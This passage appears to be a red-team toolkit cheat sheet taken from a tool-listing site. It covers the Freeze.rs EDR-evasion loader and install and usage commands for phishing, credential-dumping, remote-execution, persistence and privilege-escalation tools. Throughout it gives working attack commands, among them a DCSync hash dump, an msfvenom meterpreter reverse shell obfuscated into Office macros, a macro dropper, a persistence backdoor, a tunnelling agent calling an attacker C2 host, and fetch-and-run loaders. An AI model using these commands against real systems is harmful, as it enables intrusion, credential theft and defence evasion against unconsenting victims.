To use this clean suspended process to remove hooks from Freeze.rs loader, we need a way to programmatically find and read the clean suspended process' memory. This is where address space layout randomization (ASLR) comes into play. ASLR is a security mechanism to prevent stack memory corruption-based vulnerabilities. ASLR randomizes the address space inside of a process, to ensure that all memory-mapped objects, the stack, the heap, and the executable program itself, are unique. Now, this is where it gets interesting because while ASLR works, it does not work for position-independent code such as DLLs. What happens with DLLs, (specifically known system DLLs) is that the address space is randomized once at boot time. This means that we don't need to enumerate a remote process information to find the base address of its ntdll.dll because it is the same in all processes, including the one that we control. Since the address of every DLL is the same place per boot, we can pull this information from our own process and never have to enumerate the suspended process to find the address.

image

With this information, we can use the API ReadProcessMemory to read a process' memory. This API call is commonly associated with the reading of LSASS as part of any credential-based attack; however, on its own it is inherently not malicious, especially if we are just reading an arbitrary section of memory. The only time ReadProcessMemory will be flagged as part of something suspicious is if you are reading something you shouldn't (like the contents of LSASS). EDR products should never flag the fact that ReadProcessMemory was called, as there are legitimate operational uses for this function and would result in many false positives.

We can take this a step further by only reading a section of Ntdll.dll where all syscalls are stored - its .text section, rather than reading the entire DLL.

Combining these elements, we can programmatically get a copy of the .text section of Ntdll.dll to overwrite our existing hooked .text section prior to executing shellcode.

ETW Patching

ETW utilizes built-in syscalls to generate this telemetry. Since ETW is also a native feature built into Windows, security products do not need to "hook" the ETW syscalls to access the information. As a result, to prevent ETW, Freeze.rs patches numerous ETW syscalls, flushing out the registers and returning the execution flow to the next instruction. Patching ETW is now default in all loaders.

Shellcode

image

With Rust's NTAPI crate, you can see that all these calls do not show up under ntdll.dll, however they do still exist with in the process.

image

As a result:

image

image

Why Rust?

This started out a fun project to learn Rust and has grown into its own framework.

Contributing

Freeze.rs was developed in Rust.

Install

If Rust and Rustup is not installed please install them. If you are compiling it from OSX or Linux sure you have the target "x86_64-pc-windows-gnu" added. To so run the following command:

Once done you can compile Freeze.rs, run the following commands, or use the compiled binary:

root@kitploit:~
git clone https://github.com/optiv/Freeze
cd Freeze
rustup target add x86_64-pc-windows-gnu
cargo build --release

From there the compiled version will be found in in target/release (note if you don't put --release the file will be in target/debug/ )

root@kitploit:~
    ___________
    \_   _____/______   ____   ____ ________ ____     _______  ______
     |    __) \_  __ \_/ __ \_/ __ \\___   // __ \    \_  __ \/  ___/
     |     \   |  | \/\  ___/\  ___/ /    /\  ___/     |  | \/\___ \
     \___  /   |__|    \___  >\___  >_____ \\___  > /\ |__|  /____  >
         \/                \/     \/      \/    \/  \/            \/
                                        (@Tyl0us)
    Soon they will learn that revenge is a dish... best served COLD & Rusty...



USAGE:
    Freeze-rs [FLAGS] [OPTIONS]

FLAGS:
    -c, --console    Only for Binary Payloads - Generates verbose console information when the payload is executed. This
                     will disable the hidden window feature
    -h, --help       Prints help information
    -n, --noetw      Disables the ETW patching that prevents ETW events from being generated.
    -s, --sandbox    Enables sandbox evasion by checking:
                                 Is Endpoint joined to a domain?
                                 Does the Endpoint have more than 2 CPUs?
                                 Does the Endpoint have more than 4 gigs of RAM?
    -V, --version    Prints version information

OPTIONS:
    -E, --Encrypt <ENCRYPT>    Encrypts the shellcode using either AES 256, ELZMA or RC4 encryption
    -I, --Input <INPUT>        Path to the raw 64-bit shellcode.
    -O, --Output <OUTPUT>      Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension
                               defined will determine if Freeze makes a dll or exe.
    -p, --process <PROCESS>    The name of process to spawn. This process has to exist in C:\Windows\System32\. Example
                               'notepad.exe'
    -e, --export <export>      Defines a custom export function name for any DLL.

Binary vs DLL Freeze.rs can generate either a .exe or .dll file. To specify this, ensure that the -O command line option ends with either a .exe for binaries or .dll for dlls. No other file types are currently supported. In the case of DLL files, Freeze.rs can also add additional export functionality. To do this use the -export with specific export function name.

Encryption Encrypting shellcode is an important technique used to protect it from being detected and analyzed by EDRs and other security products. Freeze.rs comes with multiple methods to encrypt shellcode, these include AES, ELZMA, and RC4.

AES AES (Advanced Encryption Standard) is a symmetric encryption algorithm that is widely used to encrypt data. Freeze.rs uses AES-256 bit size to encrypt the shellcode. The advantage of using AES to encrypt shellcode is that it provides strong encryption and is widely supported by cryptographic libraries. However, the use of a fixed block size can make it vulnerable to certain attacks, such as the padding oracle attack.

ELZMA ELZMA is a compression and encryption algorithm that is often used in malware to obfuscate the code. To encrypt shellcode using ELZMA, the shellcode is first compressed using the ELZMA algorithm. The compressed data is then encrypted using a random key. The encrypted data and the key are then embedded in the exploit code. The advantage of using ELZMA to encrypt shellcode is that it provides both compression and encryption in a single algorithm. This can help to reduce the size of the exploit code and make it more difficult to detect.

RC4 RC4 is a symmetric encryption algorithm that is often used in malware to encrypt shellcode. It is a stream cipher that can use variable-length keys and is known for its simplicity and speed.

Console Freeze.rs utilizes a technique to first create the process and then move it into the background. This does two things - first it helps keep the process hidden, and second, avoids being detected by any EDR product. Spawning a process right away in the background can be very suspicious and an indicator of maliciousness. Freeze.rs does this by calling the ‘GetConsoleWindow’ and ‘ShowWindow’ Windows function after the process is created and the EDR’s hooks are loaded, and then changes the windows attributes to hidden.

If the -console command-line option is selected, Freeze.rs will not hide the process in the background. Instead, Freeze.rs will add several debug messages displaying what the loader is doing.


🔙WSH

Creating payload:

root@kitploit:~
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True

Execute:

root@kitploit:~
wscript payload.vbs
cscript.exe payload.vbs
wscript /e:VBScript payload.txt //If .vbs files are blacklisted

🔙HTA

Creating payload:

root@kitploit:~
<html>
  <body>
    <script>
      var c = "cmd.exe";
      new ActiveXObject("WScript.Shell").Run(c);
    </script>
  </body>
</html>

Execute: Run file

🔙VBA

Creating payload:

root@kitploit:~
Sub calc()
	Dim payload As String
	payload = "calc.exe"
	CreateObject("Wscript.Shell").Run payload,0
End Sub

Execute: Set function to Auto_Open() in macro enabled document

Initial Access

🔙Bash Bunny

The Bash Bunny is a physical USB attack tool and multi-function payload delivery system. It is designed to be plugged into a computer's USB port and can be programmed to perform a variety of functions, including manipulating and exfiltrating data, installing malware, and bypassing security measures.

hackinglab: Bash Bunny – Guide

Hak5 Documentation

Nice Payload Repo

Product Page

image

🔙EvilGoPhish

evilginx2 + gophish. (GoPhish) Gophish is a powerful, open-source phishing framework that makes it easy to test your organization's exposure to phishing. (evilginx2) Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication

Install:

root@kitploit:~
git clone https://github.com/fin3ss3g0d/evilgophish

Usage:

root@kitploit:~
Usage:
./setup <root domain> <subdomain(s)> <root domain bool> <redirect url> <feed bool> <rid replacement> <blacklist bool>
 - root domain                     - the root domain to be used for the campaign
 - subdomains                      - a space separated list of evilginx2 subdomains, can be one if only one
 - root domain bool                - true or false to proxy root domain to evilginx2
 - redirect url                    - URL to redirect unauthorized Apache requests
 - feed bool                       - true or false if you plan to use the live feed
 - rid replacement                 - replace the gophish default "rid" in phishing URLs with this value
 - blacklist bool                  - true or false to use Apache blacklist
Example:
  ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false

image

🔙Social Engineer Toolkit (SET)

This framework is great for creating campaigns for initial access, 'SET has a number of custom attack vectors that allow you to make a believable attack quickly'.

Install:

root@kitploit:~
git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install

Usage:

root@kitploit:~
python3 setoolkit

image

🔙Hydra

Nice tool for logon brute force attacks. Can bf a number of services including SSH, FTP, TELNET, HTTP etc.

Install:

root@kitploit:~
sudo apt install hydra

Usage:

root@kitploit:~
hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error"
hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh

image

🔙SquarePhish

SquarePhish is an advanced phishing tool that uses a technique combining OAuth Device code authentication flow and QR codes (See PhishInSuits for more about OAuth Device Code flow for phishing attacks).

Attack Steps:

  • Send malicious QR code to victim
  • Victim scans QR code with mobile device
  • Victim directed to attacker controlled server (Triggering OAuth Device Code authentication flow process)
  • Victim emailed MFA code (Triggering OAuth Device Code flow 15 minute timer)
  • Attacker polls for authentication
  • Victim enters code into legit Microsoft website
  • Attacker saves authentication token

Install:

root@kitploit:~
git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt

Note: Before using either module, update the required information in the settings.config file noted with Required.

Usage (Email Module):

root@kitploit:~
usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

  -e EMAIL, --email EMAIL
                        victim email address to send initial QR code email to

Usage (Server Module):

root@kitploit:~
usage: squish.py server [-h] [-c CONFIG] [--debug]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

image

🔙King Phisher

King Phisher is a tool that allows attackers to create and send phishing emails to victims to obtain sensitive information.

It includes features like customizable templates, campaign management, and email sending capabilities, making it a powerful and easy-to-use tool for carrying out phishing attacks. With King Phisher, atackers can target individuals or organizations with targeted and convincing phishing emails, increasing the chances of success in their attacks.

Install (Linux - Client & Server):

root@kitploit:~
wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && \
sudo bash ./install.sh

Usage:

Once King Phisher has been installed please follow the wiki page to setup SSH, Database config, SMTP server etc.

image

Execution

🔙Responder

Responder is a tool for poisoning the LLMNR and NBT-NS protocols on a network, to allow for credential capture and arbitrary code execution.

The LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) protocols are used by Windows systems to resolve hostnames to IP addresses on a local network. If a hostname cannot be resolved using these protocols, the system will broadcast a request for the hostname to the local network.

Responder listens for these broadcasts and responds with a fake IP address, tricking the requesting system into sending its credentials to the attacker.

Install:

root@kitploit:~
git clone https://github.com/SpiderLabs/Responder#usage
cd Responder

Usage:

root@kitploit:~
# Running the tool
./Responder.py [options]

# Typical usage
./Responder.py -I eth0 -wrf

Full usage information can be found here.

image

Image used from https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/

🔙secretsdump

A utility that is part of the Impacket library that can be used to extract password hashes and other secrets from a Windows system.

It does this by interacting with the Security Account Manager (SAM) database on the system and extracting the hashed passwords and other information, such as:

  • Password hashes for local accounts
  • Kerberos tickets and keys
  • LSA Secrets

Install:

root@kitploit:~
python3 -m pip install impacket

Usage:

root@kitploit:~
# Extract NTLM hashes with local files
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

# DCSync attack and dump the NTLM hashes of all domain users.
secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:[email protected]

image

Image used from https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy

🔙evil-winrm

Evil-WinRM is a tool that provides a command line interface for Windows Remote Management (WinRM: A service that allows administrators to remotely execute commands on a Windows machine).

Evil-WinRM allows an attacker to remotely connect to a Windows machine using WinRM and execute arbitrary commands.

Some features include:

  • Loading in memory Powershell scripts
  • Loading in memory dll files bypassing some AVs
  • Loading x64 payloads
  • Pass-the-hash support
  • Uploading and downloading local and remote files

Install: (Git)

root@kitploit:~
sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm

Install: (Ruby gem)

root@kitploit:~
gem install evil-winrm

Alternative installation instructions can be found here.

Usage:

root@kitploit:~
# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm  -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

# Upload local files to victim
upload local_filename
upload local_filename destination_filename

# Download remote files to local machine
download remote_filename
download remote_filename destination_filename

# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe

# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll

Full usage documentation can be found here.

image

Image used from https://korbinian-spielvogel.de/posts/heist-writeup/

🔙Donut

A tool for in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. It can be used to load and run custom payloads on target systems without the need to drop files to disk.

Install: (Windows)

root@kitploit:~
git clone http://github.com/thewover/donut.git

To generate the loader template, dynamic library donut.dll, the static library donut.lib and the generator donut.exe. Start an x64 Microsoft Visual Studio Developer Command Prompt, change to the directory where you cloned the Donut repository and enter the following:

root@kitploit:~
nmake -f Makefile.msvc

To do the same, except using MinGW-64 on Windows or Linux, change to the directory where you cloned the Donut repository and enter the following:

root@kitploit:~
make -f Makefile.mingw

Install: (Linux)

root@kitploit:~
pip3 install donut-shellcode

Usage:

root@kitploit:~
# Creating shellcode from an XSL file that pops up a calculator.
shellcode = donut.create(file=r"C:\\Tools\\Source\\Repos\\donut\\calc.xsl")

# Creating shellcode from an unmanaged DLL. Invokes DLLMain.
shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")

For full usage information, see the donut GitHub Page.

See a recent blog post from The Wover for more info.

image

🔙Macro_pack

A tool used to automatize the obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for red teaming.

Install: (Binary)

  1. Get the latest binary from https://github.com/sevagas/macro_pack/releases/
  2. Download binary on PC with genuine Microsoft Office installed.
  3. Open console, CD to binary dir and call the binary

Install: (Git)

root@kitploit:~
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt

Usage:

root@kitploit:~
# Help Page
python3 macro_pack.py  --help

# List all supported file formats
macro_pack.exe --listformats

# Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba

# Obfuscate Empire stager VBA file and generate a MS Word document:
macro_pack.exe -f empire.vba -o -G myDoc.docm

# Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)
echo "https://myurl.url/payload.exe" "dropped.exe" |  macro_pack.exe -o -t DROPPER -G "drop.xlsm"

# Execute calc.exe via Dynamic Data Exchange (DDE) attack
echo calc.exe | macro_pack.exe --dde -G calc.xslx

image

🔙PowerSploit

A collection of PowerShell scripts and modules that can be used to achieve a variety of red teaming objectives.

Some of the features of PowerSploit:

  • Dump password hashes and extract clear-text passwords from memory
  • Escalate privileges and bypass security controls
  • Execute arbitrary PowerShell code and bypass execution restrictions
  • Perform network reconnaissance and discovery
  • Generate payloads and execute exploits

Install: 1. Save to PowerShell modules folder

First you will need to download the PowerSploit Folder and save it to your PowerShell modules folder.

Your PowerShell modules folder path can be found with the following command:

root@kitploit:~
$Env:PSModulePath

Install: 2. Install PowerSploit as a PowerShell module

You will then need to install the PowerSploit module (use the name of the downloaded folder).

Note: Your PowerShell execution policy might block you, to fix this run the following command.

root@kitploit:~
powershell.exe -ep bypass

Now you can install the PowerSploit module.

root@kitploit:~
Import-Module PowerSploit

Usage:

root@kitploit:~
Get-Command -Module PowerSploit

image

🔙Rubeus

A tool that can be used to perform various actions related to Microsoft Active Directory (AD) environments, such as dumping password hashes, creating/deleting users, and modifying user properties.

Some of the features of Rubeus:

  • Kerberoasting
  • Golden ticket attacks
  • Silver ticket attacks

Install: (Download)

You can install the unofficial pre-compiled Rubeus binary here.

Install: (Compile)

Rubeus is compatible with Visual Studio 2019 Community Edition. Open the rubeus project .sln, choose "Release", and build.

Usage:

root@kitploit:~
Rubeus.exe -h

image

🔙SharpUp

A nice tool for checking a victims endpoint for vulnerabilites relating to high integrity processes, groups, hijackable paths, etc.

Install: (Download)

You can install the unofficial pre-compiled SharpUp binary here.

Install: (Compile)

SharpUp is compatible with Visual Studio 2015 Community Edition. Open the SharpUp project .sln, choose "Release", and build.

Usage:

root@kitploit:~
SharpUp.exe audit
#-> Runs all vulnerability checks regardless of integrity level or group membership.

SharpUp.exe HijackablePaths
#-> Check only if there are modifiable paths in the user's %PATH% variable.

SharpUp.exe audit HijackablePaths
#-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.

image

🔙SQLRecon

MS-SQL (Microsoft SQL Server) is a relational database management system developed and marketed by Microsoft.

This C# MS-SQL toolkit is designed for offensive reconnaissance and post-exploitation. For detailed usage information on each technique, refer to the wiki.

Install: (Binary)

You can download the latest binary release from here.

Usage:

root@kitploit:~
# Authenticating using Windows credentials
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# Authenticating using Local credentials
SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami

# Authenticating using Azure AD credentials
SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami

# Run whoami
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# View databases
SQLRecon.exe -a Windows -s SQL01 -d master -m databases

# View tables
SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019

Full usage information can be found on the wiki.

Tool module usage information can be found here.

image

Image used from SQLRecon help page

🔙UltimateAppLockerByPassList

This resrouce is a collection of the most common and known techniques to bypass AppLocker.

Since AppLocker can be configured in different ways @api0cradle maintains a verified list of bypasses (that works against the default AppLocker rules) and a list with possible bypass technique (depending on configuration) or claimed to be a bypass by someone.

They also have a list of generic bypass techniques as well as a legacy list of methods to execute through DLLs.

Indexed Lists

  • Generic-AppLockerbypasses.md
  • VerifiedAppLockerBypasses.md
  • UnverifiedAppLockerBypasses.md
  • DLL-Execution.md

image

Image used from https://github.com/api0cradle/UltimateAppLockerByPassList

🔙StarFighters

A JavaScript and VBScript Based Empire Launcher, which runs within their own embedded PowerShell Host.

Both Launchers run within their own embedded PowerShell Host, so we don't need PowerShell.exe.

This might be usefull when a company is blocking PowerShell.exe and/or is using a Application Whitelisting solution, but does not block running JS/VBS files.

Usage:

  • Setup a new Listener within PowerShell Empire
  • Use the Launcher command to Generate a PowerShell launcher for this listener
  • Copy and Replace the Base64 encoded Launcher Payload within the StarFighter JavaScript or VBScript file

For the JavaScript version use the following Variable:

root@kitploit:~
var EncodedPayload = "<Paste Encoded Launcher Payload Here>";

For the VBScript version use the following Variable:

root@kitploit:~
  Dim EncodedPayload: EncodedPayload = "<Paste Encoded Launcher Payload Here>"
  • Then run: wscript.exe StarFighter.js or StarFighter.vbs on Target, or DoubleClick the launchers within Explorer.

image

Image used from https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html

🔙demiguise

The aim of this project is to generate .html files that contain an encrypted HTA file.

The idea is that when your target visits the page, the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user.

This is an evasion technique to get round content / file-type inspection implemented by some security-appliances.

Further technical information here.

Install:

root@kitploit:~
git clone https://github.com/nccgroup/demiguise
cd demiguise

Usage:

root@kitploit:~
# Generate an encrypted .hta file that executes notepad.exe
python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta

image

Image used from https://github.com/nccgroup/demiguise

Persistence

🔙Impacket

Impacket provides a set of low-level Python bindings for various network protocols, including SMB, Kerberos, and LDAP, as well as higher-level libraries for interacting with network services and performing specific tasks such as dumping password hashes and creating network shares.

It also includes a number of command-line tools that can be used to perform various tasks such as dumping SAM databases, enumerating domain trusts, and cracking Windows passwords.

Install:

root@kitploit:~
python3 -m pip install impacket

Install: (With Example Scripts)

Download and extract the package, then navigate to the install folder and run...

root@kitploit:~
python3 -m pip install .

Usage:

root@kitploit:~
# Extract NTLM hashes with local files
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

# Gets a list of the sessions opened at the remote hosts
netview.py domain/user:password -target 192.168.10.2

# Retrieves the MSSQL instances names from the target host.
mssqlinstance.py 192.168.1.2

# This script will gather data about the domain's users and their corresponding email addresses.
GetADUsers.py domain/user:password@IP

Great cheat sheet for Impacket usage.

image

🔙Empire

Empire is a post-exploitation framework that allows you to generate payloads for establishing remote connections with victim systems.

Once a payload has been executed on a victim system, it establishes a connection back to the Empire server, which can then be used to issue commands and control the target system.

Empire also includes a number of built-in modules and scripts that can be used to perform specific tasks, such as dumping password hashes, accessing the Windows registry, and exfiltrating data.

Install:

root@kitploit:~
git clone https://github.com/EmpireProject/Empire
cd Empire
sudo ./setup/install.sh

Usage:

root@kitploit:~
# Start Empire
./empire

# List live agents
list agents

# List live listeners
list listeners

Nice usage cheat sheet by HarmJoy.

image

🔙SharPersist

A Windows persistence toolkit written in C#.

The project has a wiki.

Install: (Binary)

You can find the most recent release here.

Install: (Compile)

  • Download the project files from the GitHub Repo.
  • Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
  • Go to "NuGet Package Manager" --> "Package Sources"
  • Add a package source with the URL "https://api.nuget.org/v3/index.json"
  • Install the Costura.Fody NuGet package. The older version of Costura.Fody (3.3.3) is needed, so that you do not need Visual Studio 2019.
    • Install-Package Costura.Fody -Version 3.3.3
  • Install the TaskScheduler package
    • Install-Package TaskScheduler -Version 2.8.11
  • You can now build the project yourself!

Usage:

A full list of usage examples can be found here.

root@kitploit:~
#KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add

#Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add

#Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add

#Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add

image

🔙ligolo-ng

Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.

When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.

Install: (Download)

Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

Install: (Build)

Building ligolo-ng (Go >= 1.17 is required):

root@kitploit:~
go build -o agent cmd/agent/main.go
go build -o proxy cmd/proxy/main.go

# Build for Windows
GOOS=windows go build -o agent.exe cmd/agent/main.go
GOOS=windows go build -o proxy.exe cmd/proxy/main.go

Setup: (Linux)

root@kitploit:~
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

Setup: (Windows)

You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

Setup: (Proxy server)

root@kitploit:~
./proxy -h # Help options
./proxy -autocert # Automatically request LetsEncrypt certificates

Usage:

Start the agent on your target (victim) computer (no privileges are required!):

root@kitploit:~
./agent -connect attacker_c2_server.com:11601

A session should appear on the proxy server.

root@kitploit:~
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

Use the session command to select the agent.

root@kitploit:~
ligolo-ng » session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Full usage information can be found here.

image

Image used from https://github.com/nicocha30/ligolo-ng#demo

Privilege Escalation

🔙LinPEAS

LinPEAS is a nice verbose privilege escalation for finding local privesc routes on Linux endpoints.

Install + Usage:

root@kitploit:~
curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh

image

🔙WinPEAS

WinPEAS is a nice verbose privilege escalation for finding local privesc routes on Windows endpoints.

Install + Usage:

root@kitploit:~
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

image

🔙linux-smart-enumeration

Linux smart enumeration is another good, less verbose, linux privesc tool for Linux.

Install + Usage:

root@kitploit:~
curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

image

🔙Certify

Certify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).

Certify is designed to be used in conjunction with other red team tools and techniques, such as Mimikatz and PowerShell, to enable red teamers to perform various types of attacks, including man-in-the-middle attacks, impersonation attacks, and privilege escalation attacks.

Key features of Certify:

  • Certificate creation
  • Certificate signing
  • Certificate import
  • Certificate trust modification

Install: (Compile)

Certify is compatible with Visual Studio 2019 Community Edition. Open the Certify project .sln, choose "Release", and build.

Install: (Running Certify Through PowerShell)

If you want to run Certify in-memory through a PowerShell wrapper, first compile the Certify and base64-encode the resulting assembly:

root@kitploit:~
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt

Certify can then be loaded in a PowerShell script with the following (where "aa..." is replaced with the base64-encoded Certify assembly string):

root@kitploit:~
$CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))

The Main() method and any arguments can then be invoked as follows:

root@kitploit:~
[Certify.Program]::Main("find /vulnerable".Split())

Full compile instructions can be found here.

Usage:

root@kitploit:~
# See if there are any vulnerable templates
Certify.exe find /vulnerable

# Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal
Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin

Full example walkthrough can be found here.

image

🔙Get-GPPPassword

Get-GPPPassword is a PowerShell script part of the PowerSploit toolkit, it is designed to retrieve passwords for local accounts that are created and managed using Group Policy Preferences (GPP).

Get-GPPPassword works by searching the SYSVOL folder on the domain controller for any GPP files that contain password information. Once it finds these files, it decrypts the password information and displays it to the user.

Install:

Follow the PowerSploit installation instructions from this tool sheet.

root@kitploit:~
powershell.exe -ep bypass
Import-Module PowerSploit

Usage:

root@kitploit:~
# Get all passwords with additional information
Get-GPPPassword

# Get list of all passwords
Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq

image

🔙Sherlock

PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.

Supports:

  • MS10-015 : User Mode to Ring (KiTrap0D)
  • MS10-092 : Task Scheduler
  • MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
  • MS13-081 : TrackPopupMenuEx Win32k NULL Page
  • MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
  • MS15-051 : ClientCopyImage Win32k
  • MS15-078 : Font Driver Buffer Overflow
  • MS16-016 : 'mrxdav.sys' WebDAV
  • MS16-032 : Secondary Logon Handle
  • MS16-034 : Windows Kernel-Mode Drivers EoP
  • MS16-135 : Win32k Elevation of Privilege
  • CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc

Install: (PowerShell)

root@kitploit:~
# Git install
git clone https://github.com/rasta-mouse/Sherlock

# Load powershell module
Import-Module -Name C:\INSTALL_LOCATION\Sherlock\Sherlock.ps1

Usage: (PowerShell)

root@kitploit:~
# Run all functions
Find-AllVulns

# Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference)
Find-MS14058

image

Image used from https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/

🔙Watson

Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.

Great for identifying missing patches and suggesting exploits that could be used to exploit known vulnerabilities in order to gain higher privileges on the system.

Install:

Using Visual Studio 2019 Community Edition. Open the Watson project .sln, choose "Release", and build.

Usage:

root@kitploit:~
# Run all checks
Watson.exe

image

Image text used from https://github.com/rasta-mouse/Watson#usage

🔙ImpulsiveDLLHijack

A C# based tool that automates the process of discovering and exploiting DLL Hijacks in target binaries.

The discovered Hijacked paths can be weaponized, during an engagement, to evade EDR's.

Install:

  • Procmon.exe -> https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
  • Custom Confirmatory DLL's :
    • These are DLL files which assist the tool to get the confirmation whether the DLL's are been successfully loaded from the identified hijack path
    • Compiled from the MalDLL project provided above (or use the precompiled binaries if you trust me!)
    • 32Bit dll name should be: maldll32.dll
    • 64Bit dll name should be: maldll64.dll
    • Install NuGet Package:** PeNet** -> https://www.nuget.org/packages/PeNet/ (Prereq while compiling the ImpulsiveDLLHijack project)

Note: i & ii prerequisites should be placed in the ImpulsiveDLLHijacks.exe's directory itself.

  • Build and Setup Information:

    • ImpulsiveDLLHijack

      • Clone the repository in Visual Studio
      • Once project is loaded in Visual Studio go to "Project" --> "Manage NuGet packages" --> Browse for packages and install "PeNet" -> https://www.nuget.org/packages/PeNet/
      • Build the project!
      • The ImpulsiveDLLHijack.exe will be inside the bin directory.
    • And for Confirmatory DLL's:

      • Clone the repository in Visual Studio
      • Build the project with x86 and x64
      • Rename x86 release as maldll32.dll and x64 release as maldll64.dll
    • Setup: Copy the Confirmatory DLL's (maldll32 & maldll64) in the ImpulsiveDLLHijack.exe directory & then execute ImpulsiveDLLHijack.exe :))

Install instructions from https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites

Usage:

root@kitploit:~
# Help
ImpulsiveDLLHijack.exe -h

# Look for vulnerabilities in an executable
ImpulsiveDLLHijack.exe -path BINARY_PATH

Usage examples can be found here.

image

Image used from https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples

🔙ADFSDump

A C# tool to dump all sorts of goodies from AD FS.

Created by Doug Bienstock @doughsec while at Mandiant FireEye.

This tool is designed to be run in conjunction with ADFSpoof. ADFSdump will output all of the information needed in order to generate security tokens using ADFSpoof.

Requirements:

  • ADFSDump must be run under the user context of the AD FS service account. You can get this information by running a process listing on the AD FS server or from the output of the Get-ADFSProperties cmdlet. Only the AD FS service account has the permissions needed to access the configuration database. Not even a DA can access this.
